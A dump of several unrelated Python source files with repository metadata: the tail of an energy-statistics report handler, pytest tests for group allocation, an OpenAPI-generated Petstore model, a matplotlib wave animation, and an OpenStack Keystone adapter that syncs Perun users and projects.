result['reporting_period']['maximums'].append(reporting[energy_category_id]['maximum'])
result['reporting_period']['maximums_per_unit_area'].append(
reporting[energy_category_id]['maximum'] / space['area']
if reporting[energy_category_id]['maximum'] is not None and
space['area'] is not None and
space['area'] > Decimal(0.0)
else None)
result['reporting_period']['maximums_increment_rate'].append(
(reporting[energy_category_id]['maximum'] - base[energy_category_id]['maximum']) /
base[energy_category_id]['maximum']
if (base[energy_category_id]['maximum'] is not None and
base[energy_category_id]['maximum'] > Decimal(0.0))
else None)
result['reporting_period']['stdevs'].append(reporting[energy_category_id]['stdev'])
result['reporting_period']['stdevs_per_unit_area'].append(
reporting[energy_category_id]['stdev'] / space['area']
if reporting[energy_category_id]['stdev'] is not None and
space['area'] is not None and
space['area'] > Decimal(0.0)
else None)
result['reporting_period']['stdevs_increment_rate'].append(
(reporting[energy_category_id]['stdev'] - base[energy_category_id]['stdev']) /
base[energy_category_id]['stdev'] if (base[energy_category_id]['stdev'] is not None and
base[energy_category_id]['stdev'] > Decimal(0.0))
else None)
result['reporting_period']['variances'].append(reporting[energy_category_id]['variance'])
result['reporting_period']['variances_per_unit_area'].append(
reporting[energy_category_id]['variance'] / space['area']
if reporting[energy_category_id]['variance'] is not None and
space['area'] is not None and
space['area'] > Decimal(0.0)
else None)
result['reporting_period']['variances_increment_rate'].append(
(reporting[energy_category_id]['variance'] - base[energy_category_id]['variance']) /
base[energy_category_id]['variance'] if (base[energy_category_id]['variance'] is not None and
base[energy_category_id]['variance'] > Decimal(0.0))
else None)
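# Worked example (hypothetical numbers): if a category's reporting-period mean is 120 kWh and its
# base-period mean is 100 kWh, the increment rate appended above is (120 - 100) / 100 = 0.2, i.e. +20%.
# Whenever the base value is None or zero, None is appended instead of a rate.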
result['parameters'] = {
"names": parameters_data['names'],
"timestamps": parameters_data['timestamps'],
"values": parameters_data['values']
}
# export result to Excel file and then encode the file to base64 string
result['excel_bytes_base64'] = excelexporters.spacestatistics.export(result,
space['name'],
reporting_start_datetime_local,
reporting_end_datetime_local,
period_type)
resp.body = json.dumps(result)
| 60.214516
| 120
| 0.510487
|
014a34337ccfefe2296a9ec71bfe9d241db10119
| 1,510
|
py
|
Python
|
gumi/group_utils_test.py
|
kumasento/gconv-prune
|
f81c417d3754102c902bd153809130e12607bd7d
|
[
"MIT"
] | 8
|
2019-08-29T07:43:03.000Z
|
2021-03-03T14:25:09.000Z
|
gumi/group_utils_test.py
|
kumasento/gconv-prune
|
f81c417d3754102c902bd153809130e12607bd7d
|
[
"MIT"
] | null | null | null |
gumi/group_utils_test.py
|
kumasento/gconv-prune
|
f81c417d3754102c902bd153809130e12607bd7d
|
[
"MIT"
] | 2
|
2019-09-15T03:39:30.000Z
|
2020-04-30T07:06:46.000Z
|
import torch
from gumi.group_utils import get_group_allocation
def test_get_group_allocation_all_ones():
mask = torch.ones((2, 2), dtype=torch.bool)
gaf, gac = get_group_allocation(mask, G=1)
assert gaf is not None
assert gac is not None
assert (gaf == 1).all()
assert (gac == 1).all()
# Cannot split into valid groups in this case.
gaf, gac = get_group_allocation(mask, G=2)
assert gaf is None
assert gac is None
def test_get_group_allocation_block_diagonal():
mask = torch.ones((4, 4), dtype=torch.bool)
mask[2:, :2] = 0
mask[:2, 2:] = 0
gaf, gac = get_group_allocation(mask, G=2)
assert gaf is not None
assert gac is not None
assert (gaf[:2] == 1).all()
assert (gaf[2:] == 2).all()
assert (gac[:2] == 1).all()
assert (gac[2:] == 2).all()
# anti-diagonal
mask = torch.ones((4, 4), dtype=torch.bool)
mask[:2, :2] = 0
mask[2:, 2:] = 0
gaf, gac = get_group_allocation(mask, G=2)
assert gaf is not None
assert gac is not None
assert (gaf[:2] == 2).all()
assert (gaf[2:] == 1).all()
assert (gac[:2] == 1).all()
assert (gac[2:] == 2).all()
def test_get_group_allocation_scattered():
mask = torch.tensor(
[[0, 1, 0, 1], [1, 0, 1, 0], [0, 1, 0, 1], [1, 0, 1, 0],], dtype=torch.bool
)
gaf, gac = get_group_allocation(mask, G=2)
assert gaf is not None
assert gac is not None
assert (gaf == [2, 1, 2, 1]).all()
assert (gac == [1, 2, 1, 2]).all()
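# Summary (inferred from the assertions above, not from library documentation):
# get_group_allocation(mask, G) appears to return per-filter and per-channel group labels
# (gaf, gac) in the range 1..G when the boolean mask can be split into G independent blocks,
# and (None, None) when no such grouping exists.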
| 26.034483
| 83
| 0.586755
|
c93acd53c96c31681f115b251b0c4df8c708da5e
| 7,867
|
py
|
Python
|
samples/openapi3/client/petstore/python-experimental/petstore_api/models/pet.py
|
gmcouto/openapi-generator
|
bde0d77c8f3f9ae831690beecfb0c4e70f37e7b8
|
[
"Apache-2.0"
] | null | null | null |
samples/openapi3/client/petstore/python-experimental/petstore_api/models/pet.py
|
gmcouto/openapi-generator
|
bde0d77c8f3f9ae831690beecfb0c4e70f37e7b8
|
[
"Apache-2.0"
] | null | null | null |
samples/openapi3/client/petstore/python-experimental/petstore_api/models/pet.py
|
gmcouto/openapi-generator
|
bde0d77c8f3f9ae831690beecfb0c4e70f37e7b8
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
OpenAPI Petstore
This spec is mainly for testing Petstore server and contains fake endpoints, models. Please do not use this for any other purpose. Special characters: \" \\ # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
import sys # noqa: F401
import six # noqa: F401
import nulltype # noqa: F401
from petstore_api.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
int,
none_type,
str,
validate_get_composed_info,
)
try:
from petstore_api.models import category
except ImportError:
category = sys.modules[
'petstore_api.models.category']
try:
from petstore_api.models import tag
except ImportError:
tag = sys.modules[
'petstore_api.models.tag']
class Pet(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
('status',): {
'AVAILABLE': "available",
'PENDING': "pending",
'SOLD': "sold",
},
}
validations = {
}
additional_properties_type = None
_nullable = False
@cached_property
def openapi_types():
"""
This must be a class method so a model may have properties that are
of type self, this ensures that we don't create a cyclic import
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {
'name': (str,), # noqa: E501
'photo_urls': ([str],), # noqa: E501
'id': (int,), # noqa: E501
'category': (category.Category,), # noqa: E501
'tags': ([tag.Tag],), # noqa: E501
'status': (str,), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
'name': 'name', # noqa: E501
'photo_urls': 'photoUrls', # noqa: E501
'id': 'id', # noqa: E501
'category': 'category', # noqa: E501
'tags': 'tags', # noqa: E501
'status': 'status', # noqa: E501
}
_composed_schemas = {}
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, name, photo_urls, *args, **kwargs): # noqa: E501
"""pet.Pet - a model defined in OpenAPI
Args:
name (str):
photo_urls ([str]):
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
                                        composed schema that is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
id (int): [optional] # noqa: E501
category (category.Category): [optional] # noqa: E501
tags ([tag.Tag]): [optional] # noqa: E501
status (str): pet status in the store. [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.name = name
self.photo_urls = photo_urls
for var_name, var_value in six.iteritems(kwargs):
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
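# Usage sketch (illustrative only; "doggie" and the URL below are made-up values):
#
#     pet = Pet(name="doggie", photo_urls=["https://example.com/doggie.jpg"], status="available")
#
# 'name' and 'photo_urls' are the only required arguments; 'status' should be one of the
# allowed_values defined above ("available", "pending", "sold"), otherwise the generated
# validation logic is expected to reject it.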
| 37.822115
| 174
| 0.574806
|
a7739032d1cdf94e5382a387102810f690343cd4
| 775
|
py
|
Python
|
fish_ann/annimation.py
|
SamiEzz/utilities
|
e845660217e96dd9cfed45cb40a15abec450eb7f
|
[
"Apache-2.0"
] | null | null | null |
fish_ann/annimation.py
|
SamiEzz/utilities
|
e845660217e96dd9cfed45cb40a15abec450eb7f
|
[
"Apache-2.0"
] | null | null | null |
fish_ann/annimation.py
|
SamiEzz/utilities
|
e845660217e96dd9cfed45cb40a15abec450eb7f
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.animation as animation
k = 2*np.pi
w = 2*np.pi
dt = 0.01
xmin = 0
xmax = 3
nbx = 100
x = np.linspace(xmin, xmax, nbx)
fig = plt.figure()  # initialise the figure
line, = plt.plot([],[])
plt.xlim(xmin, xmax)
plt.ylim(-1,1)
# function to define when blit=True
# creates the animation background that will be present on every frame
def init():
line.set_data([],[])
return line,
def animate(i):
t = i * dt
y = np.cos(k*x - w*t)
line.set_data(x, y)
return line,
#ani = animation.FuncAnimation(fig, animate, init_func=init, frames=1000, blit=True, interval=20, repeat=False)
ani = animation.FuncAnimation(fig, animate, init_func=init, blit=True, interval=20, repeat=False)
plt.show()
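# Optional (assumes a matplotlib movie writer such as ffmpeg is installed):
# the animation object can be written to disk instead of, or in addition to, being shown, e.g.
#     ani.save('wave.mp4', fps=50)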
| 22.142857
| 111
| 0.68129
|
a84cff243f53851176c70936f087adabdbea5c64
| 30,466
|
py
|
Python
|
denbi/perun/keystone.py
|
deNBI/perunKeystoneAdapter
|
41034f337e210b5b1580042e42829eee7a5ac40c
|
[
"Apache-2.0"
] | 6
|
2018-01-18T09:11:43.000Z
|
2020-01-16T07:15:52.000Z
|
denbi/perun/keystone.py
|
deNBI/perunKeystoneAdapter
|
41034f337e210b5b1580042e42829eee7a5ac40c
|
[
"Apache-2.0"
] | 29
|
2018-02-22T07:58:28.000Z
|
2022-03-09T14:12:28.000Z
|
denbi/perun/keystone.py
|
deNBI/perunKeystoneAdapter
|
41034f337e210b5b1580042e42829eee7a5ac40c
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import itertools
import logging
import yaml
from denbi.perun.quotas import manager as quotas
from keystoneauth1.identity import v3
from keystoneauth1 import session
from keystoneclient.v3 import client
from keystoneauth1.exceptions import Unauthorized
class KeyStone:
"""
Keystone simplifies the communication with Openstack. Offers shortcuts for common functions and also
simplifies data structures returned by Keystone and offers own data structure for denbi_user and denbi_project.
Every user and every project generated by this class is marked with perun propagation auto generated flag.
denbi_user = ``{id: string, elixir_id: string, perun_id: string, email: string, enabled: boolean}``
denbi_project = ``{id: string, perun_id: string, enabled: boolean, members: [denbi_user]}``
"""
def __init__(self, environ=None, default_role="_member_",
create_default_role=False, flag="perun_propagation",
target_domain_name=None, read_only=False,
logging_domain='denbi', nested=False, cloud_admin=True):
"""
        Create a new Openstack Keystone session reading clouds.yaml from ~/.config/clouds.yaml
or /etc/openstack or using the system environment.
The following variables are considered:
- OS_AUTH_URL
- OS_USERNAME
- OS_PASSWORD
- OS_PROJECT_NAME
- OS_USER_DOMAIN_NAME
- OS_DOMAIN_NAME (for domain scoped access)
        Instead of the system variables, a "local" environment (a dict) can be set explicitly
:param environ: local environ used instead of system environment
:param default_role: default role used for all users (default is "_member_")
:param create_default_role: create a default role if it not exists (default is False)
:param flag: value used to mark users/projects (default is perun_propagation)
:param target_domain_name: domain where all users & projects are created, will be created if it not exists
:param read_only: do not make any changes to the keystone
        :param nested: use nested projects instead of cloud/domain admin access
:param cloud_admin: credentials are cloud admin credentials
"""
self.ro = read_only
self.nested = nested
self.logger = logging.getLogger(logging_domain)
if cloud_admin:
# working as cloud admin requires setting a target domain
if target_domain_name is None:
raise Exception("You need to set a target domain if working with cloud admin credentials.")
# with cloud admin credentials we do not need multiple sessions
auth = self._create_auth(environ, False)
project_session = session.Session(auth=auth)
# create session
self._project_keystone = client.Client(session=project_session)
self._domain_keystone = self._project_keystone
try:
self.target_domain_id = self._project_keystone.domains.list(name=target_domain_name)[0].id
except IndexError:
raise Exception("Unknown domain {}".format(target_domain_name))
else:
# use two separate sessions for domain and project access
domain_auth = self._create_auth(environ, True)
project_auth = self._create_auth(environ, False)
domain_session = session.Session(auth=domain_auth)
project_session = session.Session(auth=project_auth)
# we have both session, now check the credentials
# by authenticating to keystone. we also need the AccessInfo
# instances to retrieve project and domain ids for later
try:
domain_access = domain_auth.get_access(domain_session)
except Unauthorized:
raise Exception("Authorization for domain session failed, wrong credentials / role?")
try:
if domain_session is not project_session:
project_access = project_auth.get_access(project_session)
else:
project_access = domain_access
except Unauthorized:
raise Exception("Authorization for project session failed, wrong credentials / role?")
# store both session for later use
self._domain_keystone = client.Client(session=domain_session)
self._project_keystone = client.Client(session=project_session)
# override the domain name if necessary
# we need to check that a correct value is given if a different
# domain is used
# TODO: the check might need to be improved if we need to differentiate
# between domain name syntax and uuid syntax
if (target_domain_name
and target_domain_name != domain_access.domain_name
and target_domain_name != domain_access.domain_id):
                # validate the different domain name
# the credentials should be cloud admin credentials in this case
self.target_domain_id = self._resolve_domain(target_domain_name)
else:
if target_domain_name:
self.logger.debug("Overridden domain name is same as project domain, ignoring value.")
# use project domain
self.target_domain_id = domain_access.domain_id
self.logger.debug("Working on domain %s", self.target_domain_id)
if nested:
self.parent_project_id = project_access.project_id
self.logger.debug("Using nested project %s (id %s)",
project_access.project_name,
self.parent_project_id)
else:
self.parent_project_id = None
# Check if role exists ...
self.default_role = str(default_role)
self.default_role_id = None
for role in self.domain_keystone.roles.list():
if str(role.name) == self.default_role:
self.default_role_id = str(role.id)
break
# create it if wished
if not(self.default_role_id):
if create_default_role:
if not self.ro:
role = self.domain_keystone.roles.create(self.default_role)
self.default_role_id = str(role.id)
self.logger.debug('Created default role %s (id %s)', role.name, role.id)
else:
self.default_role_id = 'read-only'
self.logger.debug('Read-only mode, not creating default role')
else:
raise Exception("Default role %s does not exists and should not be created!" % default_role)
else:
self.logger.debug('Using existing default role %s (id %s)', default_role, self.default_role_id)
self.flag = flag
# initialize user and project map
self.denbi_user_map = {}
self.__user_id2perun_id__ = {}
self.denbi_project_map = {}
self.__project_id2perun_id__ = {}
# initialize the quota factory
self._quota_factory = quotas.QuotaFactory(project_session)
@property
def domain_keystone(self):
return self._domain_keystone
@property
def project_keystone(self):
return self._project_keystone
@property
def keystone(self, want_domain=True):
if want_domain:
return self.domain_keystone
else:
return self.project_keystone
@property
def quota_factory(self):
return self._quota_factory
def _create_auth(self, environ, auth_at_domain=False):
"""
Helper method to create the auth object for keystone, depending on the
        given environment (explicit environment dict, clouds.yaml or OS environment
        are supported).
This method supports authentication via project scoped tokens for
project and cloud admins, and domain scoped tokens for domain admins.
The auth_at_domain flag indicates which kind of authentication is
requested.
In case of project scoped tokens, the user domain name is also used
for the project if no separate project domain name is given.
:param environ: dicts to take auth information from
:param auth_at_domain: create domain scoped token
:returns: the auth object to be used for contacting keystone
"""
# default to shell environment if no specific one was given
if environ is None:
            clouds_yaml_file = None
if os.path.isfile('{}/.config/clouds.yaml'.format(os.environ['HOME'])):
clouds_yaml_file = '{}/.config/clouds.yaml'.format(os.environ['HOME'])
elif os.path.isfile('/etc/openstack/clouds.yaml'):
clouds_yaml_file = '/etc/openstack/clouds.yaml'
if clouds_yaml_file:
                with open(clouds_yaml_file) as stream:
try:
                        clouds_yaml = yaml.safe_load(stream)
environ = {}
environ['OS_AUTH_URL'] = clouds_yaml['clouds']['openstack']['auth']['auth_url']
environ['OS_USERNAME'] = clouds_yaml['clouds']['openstack']['auth']['username']
environ['OS_PASSWORD'] = clouds_yaml['clouds']['openstack']['auth']['password']
environ['OS_PROJECT_NAME'] = clouds_yaml['clouds']['openstack']['auth']['project_name']
environ['OS_USER_DOMAIN_NAME'] = clouds_yaml['clouds']['openstack']['auth']['user_domain_name']
# cloud admin
environ['OS_PROJECT_DOMAIN_NAME'] = clouds_yaml['clouds']['openstack']['auth']['project_domain_name'] if 'project_domain_name' in clouds_yaml['clouds']['openstack']['auth'] else clouds_yaml['clouds']['openstack']['auth']['user_domain_name']
# domain admin
environ['OS_DOMAIN_NAME'] = clouds_yaml['clouds']['openstack']['auth']['domain_name'] if 'domain_name' in clouds_yaml['clouds']['openstack']['auth'] else None
except Exception as e:
raise Exception("Error parsing/reading clouds.yaml (%s)." % clouds_yaml_file, e)
else:
environ = os.environ
if auth_at_domain:
# create a domain scoped token
auth = v3.Password(auth_url=environ['OS_AUTH_URL'],
username=environ['OS_USERNAME'],
password=environ['OS_PASSWORD'],
domain_name=environ['OS_DOMAIN_NAME'],
user_domain_name=environ['OS_USER_DOMAIN_NAME'])
else:
# create a project scoped token
project_domain_name = environ['OS_PROJECT_DOMAIN_NAME'] if 'OS_PROJECT_DOMAIN_NAME' in environ else environ['OS_USER_DOMAIN_NAME']
auth = v3.Password(auth_url=environ['OS_AUTH_URL'],
username=environ['OS_USERNAME'],
password=environ['OS_PASSWORD'],
project_name=environ['OS_PROJECT_NAME'],
user_domain_name=environ['OS_USER_DOMAIN_NAME'],
project_domain_name=project_domain_name)
return auth
def _resolve_domain(self, target_domain):
"""
Helper method to check whether the given domain is accessible and
to return the ID of that domain
:param target_domain: name or id of the domain to check
:returns: the keystone id of the given domain if the domain
is accessible
"""
# start by enumerating all domains the current sessions have access to
for domain in itertools.chain(self.domain_keystone.auth.domains(),
self.project_keystone.auth.domains()):
# compare domain to target and return id on match
if (domain.id == target_domain or domain.name == target_domain):
return domain.id
# no matching domain found....
raise Exception("Unknown or inaccessible domain %s" % target_domain)
def users_create(self, elixir_id, perun_id, email=None, enabled=True):
"""
Create a new user and updates internal user list
:param elixir_id: elixir_id of the user to be created
:param perun_id: perun_id of the user to be created
:param email: email of the user to be created (optional, default is None)
:param enabled: status of the user (optional, default is None)
:return: a denbi_user hash {id:string, elixir_id:string, perun_id:string, email:string, enabled: boolean}
"""
if not self.ro:
os_user = self.keystone.users.create(name=str(elixir_id), # str
domain=str(self.target_domain_id), # str
email=str(email), # str
perun_id=str(perun_id), # str
enabled=enabled, # bool
deleted=False, # bool
flag=self.flag) # str
denbi_user = {'id': str(os_user.id),
'elixir_id': str(os_user.name),
'perun_id': str(os_user.perun_id),
'enabled': bool(os_user.enabled),
'deleted': False}
if hasattr(os_user, 'email'):
denbi_user['email'] = str(os_user.email)
else:
denbi_user['email'] = str(None)
else:
# Read-only
denbi_user = {'id': 'read-only',
'elixir_id': 'read-only@elixir-europe.org',
'perun_id': perun_id,
'enabled': enabled,
'email': str(email),
'deleted': False}
self.logger.info("Create user [%s,%s,%s].", denbi_user['elixir_id'], denbi_user['perun_id'], denbi_user['id'])
self.__user_id2perun_id__[denbi_user['id']] = denbi_user['perun_id']
self.denbi_user_map[denbi_user['perun_id']] = denbi_user
return denbi_user
def users_delete(self, perun_id):
"""
        Disable the user and tag it as deleted. Since it is dangerous to delete a user completely, the delete function
        just disables the user and tags it as deleted. To remove a user completely use the function terminate.
:param perun_id: perunid of user to be deleted
:return:
"""
self.users_update(perun_id, enabled=False, deleted=True)
def users_terminate(self, perun_id):
"""
Delete a user
:param perun_id: perunid of user to be deleted
:return:
"""
perun_id = str(perun_id)
if perun_id in self.denbi_user_map:
denbi_user = self.denbi_user_map[perun_id]
# delete user
if not self.ro:
self.keystone.users.delete(denbi_user['id'])
self.logger.info("Terminate user [%s,%s,%s]", denbi_user['elixir_id'], denbi_user['perun_id'], denbi_user['id'])
# remove entry from map
del(self.denbi_user_map[perun_id])
else:
raise ValueError('User with perun_id %s not found in user_map' % perun_id)
def users_update(self, perun_id, elixir_id=None, email=None, enabled=None, deleted=False):
"""
Update an existing user entry.
:param elixir_id: elixir id
:param email: email
:param enabled: status
:return: the modified denbi_user hash
"""
perun_id = str(perun_id)
if perun_id in self.denbi_user_map:
denbi_user = self.denbi_user_map[perun_id]
if elixir_id is None:
elixir_id = denbi_user['elixir_id']
if email is None:
email = denbi_user['email']
if enabled is None:
enabled = denbi_user['enabled']
if not self.ro:
os_user = self.keystone.users.update(denbi_user['id'], # str
name=str(elixir_id), # str
email=str(email), # str
enabled=bool(enabled), # bool
deleted=bool(deleted)) # bool
            denbi_user['elixir_id'] = str(os_user.name)
denbi_user['enabled'] = bool(os_user.enabled)
denbi_user['deleted'] = bool(os_user.deleted)
denbi_user['email'] = str(os_user.email)
self.denbi_user_map[denbi_user['perun_id']] = denbi_user
self.logger.info("Update user [%s,%s,%s] as deleted = %s", denbi_user['elixir_id'], denbi_user['perun_id'], denbi_user['id'], str(deleted))
return denbi_user
else:
raise ValueError('User with perun_id %s not found in user_map' % perun_id)
def users_map(self):
"""
Return a de.NBI user map {elixir-id -> denbi_user }
:return: a denbi_user map ``{elixir-id: {id:string, elixir_id:string, perun_id:string, email:string, enabled: boolean}}``
"""
self.denbi_user_map = {} # clear previous project list
self.__user_id2perun_id__ = {}
for os_user in self.keystone.users.list(domain=self.target_domain_id):
            # consider only correctly flagged users
            # any other checks (like for name or perun_id) are then not necessary ...
if hasattr(os_user, "flag") and str(os_user.flag) == self.flag:
if not hasattr(os_user, 'perun_id'):
raise Exception("User ID %s should have perun_id" % (os_user.id, ))
denbi_user = {'id': str(os_user.id), # str
'perun_id': str(os_user.perun_id), # str
'elixir_id': str(os_user.name), # str
'enabled': bool(os_user.enabled), # boolean
'deleted': bool(getattr(os_user, 'deleted', False))} # boolean
# check for optional attribute email
if hasattr(os_user, 'email'):
denbi_user['email'] = str(os_user.email) # str
else:
denbi_user['email'] = str(None) # str
# create entry in maps
self.denbi_user_map[denbi_user['perun_id']] = denbi_user
self.__user_id2perun_id__[denbi_user['id']] = denbi_user['perun_id']
return self.denbi_user_map
def projects_create(self, perun_id, name=None, description=None, members=None, enabled=True):
"""
Create a new project in the admins user default domain.
:param perun_id: perun_id of the project
:param name: name of the project (optional, if not set the perun_id will be used)
:param description: description of this project (optional)
:param members: list of user id, which are members of this project
:param enabled: default True
:return: a denbi_project {id: string, perun_id: string, enabled: boolean, members: [denbi_users]}
"""
perun_id = str(perun_id)
if name is None:
name = perun_id
if not self.ro:
os_project = self.keystone.projects.create(name=str(name),
perun_id=perun_id,
domain=self.target_domain_id,
description=description,
enabled=bool(enabled),
scratched=False,
flag=self.flag,
parent=self.parent_project_id if self.nested else None)
denbi_project = {'id': str(os_project.id),
'name': str(os_project.name),
'perun_id': str(os_project.perun_id),
'description': os_project.description,
'enabled': bool(os_project.enabled),
'scratched': bool(os_project.scratched),
'members': []}
else:
denbi_project = {'id': 'read-only-fake',
'name': name,
'perun_id': perun_id,
'description': description,
'enabled': enabled,
'scratched': False,
'members': []}
self.logger.info("Create project [%s,%s].", denbi_project['perun_id'], denbi_project['id'])
self.denbi_project_map[denbi_project['perun_id']] = denbi_project
self.__project_id2perun_id__[denbi_project['id']] = denbi_project['perun_id']
# if a list of members is given append them to current project
if members:
for member in members:
self.projects_append_user(perun_id, member)
return denbi_project
def projects_update(self, perun_id, members=None, name=None,
description=None, enabled=None, scratched=False):
"""
Update a project
:param perun_id: perun_id of the project to be modified
:param members: list of perun user id
:param name:
:param description:
:param enabled:
:param scratched: - tagged for termination
:return:
"""
perun_id = str(perun_id)
add = []
rem = []
project = self.denbi_project_map[perun_id]
if (name is not None or description is not None or enabled is not None or project['scratched'] != scratched):
if name is None:
name = project['name']
if description is None:
description = project['description']
if enabled is None:
enabled = project['enabled']
if scratched:
enabled = False
if not self.ro:
self.keystone.projects.update(project['id'],
name=str(name),
description=description,
enabled=bool(enabled),
scratched=bool(scratched))
project['name'] = str(name)
project['description'] = description
project['enabled'] = bool(enabled)
project['scratched'] = bool(scratched)
self.logger.info("Update project [%s,%s].", project['perun_id'], project['id'])
        # update members list
if members:
# search for member to be removed or added
for m in set(members) ^ set(project["members"]):
if m in project["members"]:
# members to remove
rem.append(m)
else:
# members to add
add.append(m)
for m in rem:
self.projects_remove_user(perun_id, m)
for m in add:
self.projects_append_user(perun_id, m)
def projects_delete(self, perun_id):
"""
        Disable and tag a project as deleted. Since it is dangerous to delete a project completely, the function just
        disables the project and tags it as deleted. To remove a project from keystone use the function projects_terminate.
:param perun_id: perun_id of project to be deleted
:return:
"""
self.projects_update(perun_id, scratched=True)
def projects_terminate(self, perun_id):
"""
        Terminate a project tagged as deleted. Raises an exception (ValueError) for an invalid perun_id or when terminating
        an untagged project.
:param perun_id: perunid of project to be deleted
:return:
"""
perun_id = str(perun_id)
if perun_id in self.denbi_project_map:
# get project from map
denbi_project = self.denbi_project_map[perun_id]
if denbi_project['scratched']:
# delete project by id in keystone database
if not self.ro:
self.keystone.projects.delete(denbi_project['id'])
self.logger.info("Terminate project [%s,%s].", denbi_project['perun_id'], denbi_project['id'])
# delete project from project map
del(self.denbi_project_map[denbi_project['perun_id']])
else:
raise ValueError('Project with perun_id %s must be tagged as deleted before terminate!' % perun_id)
else:
raise ValueError('Project with perun_id %s not found in project_map!' % perun_id)
def projects_map(self):
"""
Return a map of projects
:return: a map of denbi projects ``{perun_id: {id: string, perun_id: string, enabled: boolean, members: [denbi_users]}}``
"""
self.denbi_project_map = {}
        self.__project_id2perun_id__ = {}
for os_project in self.keystone.projects.list(domain=self.target_domain_id):
if hasattr(os_project, 'flag') and os_project.flag == self.flag:
self.logger.debug('Found denbi associated project %s (id %s)',
os_project.name, os_project.id)
denbi_project = {
'id': str(os_project.id), # str
'name': str(os_project.name), # str
'perun_id': str(os_project.perun_id), # str
'description': os_project.description, #
'enabled': bool(os_project.enabled), # bool
'scratched': bool(os_project.scratched), # bool
'members': []
}
# create entry in maps
self.__project_id2perun_id__[denbi_project['id']] = denbi_project['perun_id']
self.denbi_project_map[denbi_project['perun_id']] = denbi_project
# get all assigned roles for this project
            # this call should be possible with domain admin rights
            # include_subtree is necessary since the default policies may not
            # otherwise allow domain-wide role assignment queries
for role in self.keystone.role_assignments.list(project=os_project.id, include_subtree=True):
if role.user['id'] in self.__user_id2perun_id__:
self.logger.debug('Found user %s as member in project %s', role.user['id'], os_project.name)
denbi_project['members'].append(self.__user_id2perun_id__[role.user['id']])
return self.denbi_project_map
def projects_append_user(self, project_id, user_id):
"""
        Append a user to a project (grant default_role to the user on the project)
:param project_id: perun id of a project
:param user_id: perun id of an user
:return:
"""
project_id = str(project_id)
user_id = str(user_id)
# check if project/user exists
if not(project_id in self.denbi_project_map):
            raise ValueError('A project with perun_id: %s does not exist!' % project_id)
if not(user_id in self.denbi_user_map):
            raise ValueError('A user with perun_id: %s does not exist!' % user_id)
# get keystone id for user and project
pid = self.denbi_project_map[project_id]['id']
uid = self.denbi_user_map[user_id]['id']
if not self.ro:
self.keystone.roles.grant(role=self.default_role_id, user=uid, project=pid)
self.denbi_project_map[project_id]['members'].append(user_id)
self.logger.info("Append user %s to project %s.", user_id, project_id)
def projects_remove_user(self, project_id, user_id):
"""
        Remove a user from a project (revoke default_role from the user on the project)
:param project_id: perun id of an project
        :param user_id: perun id of a user
:return:
"""
project_id = str(project_id)
user_id = str(user_id)
# check if project/user exists
if not(project_id in self.denbi_project_map):
            raise ValueError('A project with perun_id: %s does not exist!' % project_id)
if not(user_id in self.denbi_user_map):
            raise ValueError('A user with perun_id: %s does not exist!' % user_id)
# get keystone id for user and project
pid = self.denbi_project_map[project_id]['id']
uid = self.denbi_user_map[user_id]['id']
if not self.ro:
self.keystone.roles.revoke(role=self.default_role_id, user=uid, project=pid)
